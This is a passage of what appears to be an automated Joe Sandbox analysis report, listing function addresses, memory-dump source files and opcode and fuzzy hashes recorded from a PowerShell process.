                                                                                      Function 06D1A282 Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ec19c41efd21325cea90b6e07bfa20a34a9d5f26f2445527925aafe8868d09c8
                                                                                      • Instruction ID: 5142af3ecc5bc5c18ba83c5e10c23c2e43b1ba4a95d684a5557b967a631d1622
                                                                                      • Opcode Fuzzy Hash: ec19c41efd21325cea90b6e07bfa20a34a9d5f26f2445527925aafe8868d09c8
                                                                                      • Instruction Fuzzy Hash: CC01D270D1A3869FD794CFB9D8402AEBFB5FF46310F18929AC014AB252D7718581CF80
                                                                                      Function 06F6F6E8 Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2bf3c5aa6da18fe6b657dfea6a923b74f2188b739d8fc70f4968e094fadfc7f5
                                                                                      • Instruction ID: 43c2b03b5af90bdc83c0447e958fbceed952539136e32e39163cf80e4979cf72
                                                                                      • Opcode Fuzzy Hash: 2bf3c5aa6da18fe6b657dfea6a923b74f2188b739d8fc70f4968e094fadfc7f5
                                                                                      • Instruction Fuzzy Hash: 7B01D3B4D05249AFDB44DFAAD9419AEBBF6AB48300F1080AAE814A3351D7349A41DF91
                                                                                      Function 06F496BF Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cc844b1f7d97470263851b5df85d195d0c6f14a5054295d9ef3e257220af75d1
                                                                                      • Instruction ID: 838d56b93353a2c882e55cfce97e6c892bf6db19267923e0652dc07f1e457b2c
                                                                                      • Opcode Fuzzy Hash: cc844b1f7d97470263851b5df85d195d0c6f14a5054295d9ef3e257220af75d1
                                                                                      • Instruction Fuzzy Hash: 04F0AF75B00104AFDF05DBA8ACA57EEBBB5DB86210F1045AAE405DB340EA715E078791
                                                                                      Function 06F68140 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e8b6a6d08a668ea94976f7345dec15f1d5dd074994b82e12ef96a62bdb93c22
                                                                                      • Instruction ID: a36b4ed1733c23c6efc47c7bb835ed270495c88a3ed27ca283b2646d5cc51663
                                                                                      • Opcode Fuzzy Hash: 4e8b6a6d08a668ea94976f7345dec15f1d5dd074994b82e12ef96a62bdb93c22
                                                                                      • Instruction Fuzzy Hash: DA018B32C0461ADFCF01DF98C8009EDBB71FF89321F05C50AE9A867621D335A692DBA0
                                                                                      Function 06F49698 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: de2f1b9829fd0d2e86484115ec8ba60644ab057d5358fb97a130c28639ac24e7
                                                                                      • Instruction ID: 73cef90bfb0ed4af2e1675572c6a01528d55fb50c0e3edfe5dacbf18797d8f2e
                                                                                      • Opcode Fuzzy Hash: de2f1b9829fd0d2e86484115ec8ba60644ab057d5358fb97a130c28639ac24e7
                                                                                      • Instruction Fuzzy Hash: D9F0F921F042804FEF419B74E8A539EBFB1DF87724F1841D6D4415B296CA616C07C790
                                                                                      Function 06F4DCB0 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 76f0c3948fd173caad7ecb7d266fd08b154f58c1dd68cd24b6e09e58781ca8d7
                                                                                      • Instruction ID: e3160d63d7f2a65d315c0e9f2e9043c63fd07534c18a020c392700088a614461
                                                                                      • Opcode Fuzzy Hash: 76f0c3948fd173caad7ecb7d266fd08b154f58c1dd68cd24b6e09e58781ca8d7
                                                                                      • Instruction Fuzzy Hash: 56F0660448E7D21FC713873858B60A9BFB0EC0741432E95CBD8D08F8A7C108A42BE3AB
                                                                                      Function 06F69EE0 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 081a5abe50a85fc76ddd8bbcad2360904dbd1a0ef8a36a2f76cbb31aa7ef3da4
                                                                                      • Instruction ID: 4dfa583446eb2b5ec248092d9ce13ee0164b2b9475ce4c512440db7a0fbd38ae
                                                                                      • Opcode Fuzzy Hash: 081a5abe50a85fc76ddd8bbcad2360904dbd1a0ef8a36a2f76cbb31aa7ef3da4
                                                                                      • Instruction Fuzzy Hash: 60F06230809258BFC741DBA9D9509ADBFB8AB4A310F14809AF894D6241C6359A11DB51
                                                                                      Function 06D19E48 Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a445821b515939a30631102d5229a1c9971757fd35a091f6f478903cc1a1712
                                                                                      • Instruction ID: ae4c630d0f0c71e116c1d18b6cf76a0dffdb11bdd07df60ed8783dc2e10fc1a5
                                                                                      • Opcode Fuzzy Hash: 9a445821b515939a30631102d5229a1c9971757fd35a091f6f478903cc1a1712
                                                                                      • Instruction Fuzzy Hash: ABF0EC70D15219EFCB84DFA8D5546ADBBF4FB08305F1045AAD809E7240E7755B80CF91
                                                                                      Function 06D19E38 Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ced55b4691a6007111fb8870f35ef98bbfeeeb173253b637f04b9c2badec865
                                                                                      • Instruction ID: 90789ae7d9ed6ce24bb04dbbf9d27435a95e1348ab480ddcb264a38d1602f01e
                                                                                      • Opcode Fuzzy Hash: 7ced55b4691a6007111fb8870f35ef98bbfeeeb173253b637f04b9c2badec865
                                                                                      • Instruction Fuzzy Hash: B001FF70C0625ADFCB44CFA8C9646EEBBB0BF09310F6044AAD424AB280C7351A81CF91
                                                                                      Function 06F6AC40 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9b7d1eea99422fcc753338b1c3f08fb65192da852b25999c030aec9cfa1ecc70
                                                                                      • Instruction ID: 2777b2d531aa05ef8cc1c92104694415afe7210f2cbee166df1a4e049ccb9714
                                                                                      • Opcode Fuzzy Hash: 9b7d1eea99422fcc753338b1c3f08fb65192da852b25999c030aec9cfa1ecc70
                                                                                      • Instruction Fuzzy Hash: 98F05E30D09248AFC781EFB9D8455DCBFB4EB4A310F1480DAE849A3242D6359A01DF92
                                                                                      Function 06F4C14F Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32567a6251e2cfe79eb7e569016b1d4ded5f96169865a5a77499d60d63469242
                                                                                      • Instruction ID: 0ef059a332d674f19b2c0947f812799b5f10aff281271379dc6f8044ba30a22d
                                                                                      • Opcode Fuzzy Hash: 32567a6251e2cfe79eb7e569016b1d4ded5f96169865a5a77499d60d63469242
                                                                                      • Instruction Fuzzy Hash: 94F05E31E05244EFCF86DBB498586DDBFF29F84211F1484AAD44597291DB784A87CB84
                                                                                      Function 06F6C688 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b07633f88d23f29a0b8f7dfda52bfc4666b2b0a2be75b18c7bb532ac5b44669
                                                                                      • Instruction ID: fdc0cf8f8994a1d2f24835120dc39d7b8a22879dc2ec946990ca74074495075b
                                                                                      • Opcode Fuzzy Hash: 1b07633f88d23f29a0b8f7dfda52bfc4666b2b0a2be75b18c7bb532ac5b44669
                                                                                      • Instruction Fuzzy Hash: 47F0E274C09208BFC740EFA9C8809E8BFB4EB0A310F10919AE888C7341C6369A42CF91
                                                                                      Function 06F66481 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e99b0e3b3fc522252f7f16ff02d9aed74a4f8aa8a8e632a2086e5285a4d13a24
                                                                                      • Instruction ID: a7f7844a31c7ad3f44660952b1b97ae247fad26bb14c066115224cfa8b9e21be
                                                                                      • Opcode Fuzzy Hash: e99b0e3b3fc522252f7f16ff02d9aed74a4f8aa8a8e632a2086e5285a4d13a24
                                                                                      • Instruction Fuzzy Hash: A6F08239909248BFCB01CF94D9508DDBF75FF49320F14C489FC055B251C6729A62DB51
                                                                                      Function 06F68150 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f9c5445a08c07d741996958530102dd67b781fa1097eb99de9cf1a87794b8ba8
                                                                                      • Instruction ID: 584ec7b212e5dbba0120f29e99b59007db9d228ecb814abb478aa6b18476d84d
                                                                                      • Opcode Fuzzy Hash: f9c5445a08c07d741996958530102dd67b781fa1097eb99de9cf1a87794b8ba8
                                                                                      • Instruction Fuzzy Hash: E3F0E731C0021AEBCF01EF99C8009EEBB75FF89320F00C519E96827210D772A5A6DFA0
                                                                                      Function 06F688E1 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 405032b307b529aad8144fb94b5a88bcbb478ec59bc146b95bad8a6878de1ef6
                                                                                      • Instruction ID: d135e632e90a1bc98bf49f557979d2574ff104b65397654de55a2280b4bd6930
                                                                                      • Opcode Fuzzy Hash: 405032b307b529aad8144fb94b5a88bcbb478ec59bc146b95bad8a6878de1ef6
                                                                                      • Instruction Fuzzy Hash: 4801B6759042199FEB61CF50CC91BDEBBB9FB48714F1040AAA619A7281DB319A85CF50
                                                                                      Function 06F65920 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9f071a6cb67206eaa618243c508d47cb1ca57118e9b9c4c395b69ad4fcf91a05
                                                                                      • Instruction ID: 93acbbb12410b7176a7879686607611e425baec0acd25f2de0dc4f70e13f6237
                                                                                      • Opcode Fuzzy Hash: 9f071a6cb67206eaa618243c508d47cb1ca57118e9b9c4c395b69ad4fcf91a05
                                                                                      • Instruction Fuzzy Hash: 90F0ECB9809208FFCB01CF90D940DDDBF71EB89320F05C09AFC442A252C6328E22EB91
                                                                                      Function 06F68F38 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a4529adbdf999701acc0c2180f442eccf7c7f0fd3efe173fd80986155e83259
                                                                                      • Instruction ID: 16199c1caa560dd7ce5a4ae7bbb42a05140b85e193e8cfe69010a7d9090e19eb
                                                                                      • Opcode Fuzzy Hash: 1a4529adbdf999701acc0c2180f442eccf7c7f0fd3efe173fd80986155e83259
                                                                                      • Instruction Fuzzy Hash: 67F0BE39D08248EFCB52DFA4D850AEDBFB9AB4D310F14C09EEC5457252D6368A51EF90
                                                                                      Function 06F47350 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d20f84c07982f1d13225e7f75f6d12993e0ea59cfb3ffdb527bb3e5918d16f17
                                                                                      • Instruction ID: 435126cbf31ae0b7e0e43f77945a8dd9ee2ec14c50323839e2b8d0abe7733af4
                                                                                      • Opcode Fuzzy Hash: d20f84c07982f1d13225e7f75f6d12993e0ea59cfb3ffdb527bb3e5918d16f17
                                                                                      • Instruction Fuzzy Hash: B6F0A070C451489FC781EBB8C4822ECBFF4DB0A210F2080DACC4883642C632A947CF40
                                                                                      Function 06F46C2E Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2653fae79ea9520c15c5b948d40cfcf77be58ccd4ae364bd3ba0bef2d80359ee
                                                                                      • Instruction ID: f402a074404ab5877d82dbb8c3ce54e26112051bc67d8b80321a0279d064dc8a
                                                                                      • Opcode Fuzzy Hash: 2653fae79ea9520c15c5b948d40cfcf77be58ccd4ae364bd3ba0bef2d80359ee
                                                                                      • Instruction Fuzzy Hash: 8B01C434901219CFEB54DF58D59ABADBBB6EF06305F5000A9E409EBA52CB346E81CF81
                                                                                      Function 06D11230 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c7a1c937ae5d71e7ad4bb5294caec63de60b1c203f3fd03f338ccc5c5b116a4
                                                                                      • Instruction ID: a7e555815563f7f8e2450ce50ef2272427375750c34ae2a978f8957a03528e3a
                                                                                      • Opcode Fuzzy Hash: 7c7a1c937ae5d71e7ad4bb5294caec63de60b1c203f3fd03f338ccc5c5b116a4
                                                                                      • Instruction Fuzzy Hash: D7F08230809248AFCB51DBA8D8924ECBF71DB5B210F148599C98057211C6329917DB51
                                                                                      Function 06F64870 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: edafcd1b50e6b78f2c35602bc119d60b9f86b0961289b89576a7c9d61c8fa373
                                                                                      • Instruction ID: 7974d4c26547e7518df731311843545bd0cfb30157575841c21728215f645222
                                                                                      • Opcode Fuzzy Hash: edafcd1b50e6b78f2c35602bc119d60b9f86b0961289b89576a7c9d61c8fa373
                                                                                      • Instruction Fuzzy Hash: 10F0E2B4C09288AFC795DFA8C500A9CBFF0AB05300F00C0EAE8449B242C636EA85CFC1
                                                                                      Function 06F46655 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a55068023dd4a4babfd1e7ed9ecedb338e50d166356d5ca97b0e6c5b1318826
                                                                                      • Instruction ID: 0a1354deb0713e7a3557e834152594062384629aacb18b5c5d336253e5af27cf
                                                                                      • Opcode Fuzzy Hash: 4a55068023dd4a4babfd1e7ed9ecedb338e50d166356d5ca97b0e6c5b1318826
                                                                                      • Instruction Fuzzy Hash: B9F0C470D00218CFEB54DF58D894B9DBBB6FB4A715F5041A9E405AB640DF34AD828F52
                                                                                      Function 06D3F948 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b113d00eb7035c9247fb62fd280498f72b9524be6ed58603d4c64e678ced99ff
                                                                                      • Instruction ID: c20ad820317c78b511b620143a5dee338ded411f2016467f3a540995c9456cf7
                                                                                      • Opcode Fuzzy Hash: b113d00eb7035c9247fb62fd280498f72b9524be6ed58603d4c64e678ced99ff
                                                                                      • Instruction Fuzzy Hash: CDF03974C19288AFCB41DFA4D9919ECBFB0DB4A210F1881D9C8845B212CA329A07DF61
                                                                                      Function 06F63E98 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b075d7052769e5823b72593de48c08922ec31f12c8718ecff3702cd39462ccf
                                                                                      • Instruction ID: 34b0f78c28c52fda57e68aa9d2324d3fddba5099af3549c6d7c17e9e2677a56a
                                                                                      • Opcode Fuzzy Hash: 0b075d7052769e5823b72593de48c08922ec31f12c8718ecff3702cd39462ccf
                                                                                      • Instruction Fuzzy Hash: C6E0EDB1D1A2448FCB50DBA8D9818ECBF70EB6A320F1894EAD80417282CA325E46CB50
                                                                                      Function 06F47DA2 Relevance: .0, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 85b2b1d220e6dc76be4a30997d415f503c6aec6b018c3f79bfa0c211873c6630
                                                                                      • Instruction ID: 56f3923455ef8b65d8e4a5abda50c931dbba3fbd3e494e796b12fe3aecb63dfd
                                                                                      • Opcode Fuzzy Hash: 85b2b1d220e6dc76be4a30997d415f503c6aec6b018c3f79bfa0c211873c6630
                                                                                      • Instruction Fuzzy Hash: FDF08C30D092889FCB84EFB8C4506ACBFF0AF4A200F04C0EAC84897352D6359A02CF40
                                                                                      Function 06F4C160 Relevance: .0, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 379197262a1e93a89b14826af1290471a1f82b8eb61d2e9929dbec401269a434
                                                                                      • Instruction ID: e1bd0868ada6eda238aa3e778e6166d068c8d76d8bc684f9b47661acde545334
                                                                                      • Opcode Fuzzy Hash: 379197262a1e93a89b14826af1290471a1f82b8eb61d2e9929dbec401269a434
                                                                                      • Instruction Fuzzy Hash: A1F06531E04318EFCF49DB65D8486DDBFB6DF84311F048495D00597250DB745A82CB94
                                                                                      Function 06F4DFF0 Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8b8ad7dfd442a8fdd464ea10453774e8371531d1c67fa260c1c5041ea30eed3
                                                                                      • Instruction ID: 6f27ecda6d61192c1dae6878fac93b2471b1097edc9208fe765f21260066f315
                                                                                      • Opcode Fuzzy Hash: c8b8ad7dfd442a8fdd464ea10453774e8371531d1c67fa260c1c5041ea30eed3
                                                                                      • Instruction Fuzzy Hash: B8E0DF31B843409FEBF267B84C027A93FA46F12651F2400E9DDA59F6C2CD61E846C762
                                                                                      Function 06F46180 Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 042fc6f757ab26044e8b53deb19afade0d2c6c08494d1f9a0997ce3c90f603e5
                                                                                      • Instruction ID: b6d07121292f44eca34a54da390aca4ad7445ff304ed61007a1bee4fd74501f2
                                                                                      • Opcode Fuzzy Hash: 042fc6f757ab26044e8b53deb19afade0d2c6c08494d1f9a0997ce3c90f603e5
                                                                                      • Instruction Fuzzy Hash: 64E06D70C0A248DFCB51EFF8D449599BFB4AF4A300F1045A6D845D3241EB309A44CB51
                                                                                      Function 06F69EF0 Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e8a6dcef2005eb10274540b05a388258461aa7ccfeb28748cb503430fd04b90f
                                                                                      • Instruction ID: 4737d505acb393b7986befec9a703aa8b2e0baed545966d8722e5482ec23a2ff
                                                                                      • Opcode Fuzzy Hash: e8a6dcef2005eb10274540b05a388258461aa7ccfeb28748cb503430fd04b90f
                                                                                      • Instruction Fuzzy Hash: 58F01574D08248AFCB80DFA9C850AADBBF8EB49210F14C09AF85893241C6359A51EF90
                                                                                      Function 06F486AE Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f9ba3f550b35000bb9560f0a27c7f9e34e43d56b905aadf5e53a5fa84f72f1e
                                                                                      • Instruction ID: 97b1979b5c52f2facf6d12b57bbbc4377710b1fe1f5eeacaed32679470644bac
                                                                                      • Opcode Fuzzy Hash: 3f9ba3f550b35000bb9560f0a27c7f9e34e43d56b905aadf5e53a5fa84f72f1e
                                                                                      • Instruction Fuzzy Hash: 5DF0B2B4E02209CFEB54DF68D984A99BBF2FB54310F1449A5D008E3315EB309D82CB40
                                                                                      Function 06F6FE38 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
